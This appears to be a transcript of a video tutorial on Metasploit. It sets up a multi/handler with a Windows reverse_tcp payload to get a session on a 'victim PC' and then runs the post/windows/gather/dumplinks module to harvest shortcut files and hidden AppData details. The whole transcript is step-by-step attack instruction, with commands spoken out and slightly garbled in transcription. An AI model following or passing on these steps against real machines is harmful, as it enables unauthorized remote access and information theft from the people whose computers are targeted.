Hi, welcome back to my video. In this video, you are going to learn how to get the links present on the victim PC. Getting links or dumping links from the victim PC is just like gathering the information of a victim. So if you are trying to dump the link files from the victim PC, then you will get in .lnk extension. So these files are used by the Microsoft Windows to point an executable files. LNK stands for link. And the shortcut files are used as a direct link to an executable file instead of having to negative to the executable. And these files come with some properties such as the path of an executable file and the start in directory and also .lnk file which contains stamps, file location including sharing name, volume serial number and more. So now let's begin. Here I am using the simple and common exploit model, typing use exploit /multi/handler, and next setting up the payload, set payload windows /interpreter/reverse_tcp, and next setting up the lhost, set lhost and the IP address. Always remember that this lhost is your local IP address, and next setting up the L port, at last typing exploit. So now here you can see that a session has been created. So by using this session we are going to dump the links which are present on the victim PC. Now pressing Ctrl Z, after that Y. So now the session will be running in background. To check the active session, we need to type sessions. Here you can see the active session. Now for gathering the information, I am using the post exploit model. So for that I am typing use post /windows /gather /dump links. So this model is going to get all the links from the victim PC. And next setting up the session by typing set session1. The 1 stands for the session ID. At last typing exploit. Now wait for some time. Okay, now here you can see that it has started gathering all the links from the victim PC. So the Windows has created these link files automatically for many common files. In the most of the PC, the app data folder will be hidden. Now here you can see that the content present in the app data has been added to the .lnk file. That means we can gather all the information from the victim PC when it is hidden also. So that's how we are going to dump the links present on the victim PC. Thank you.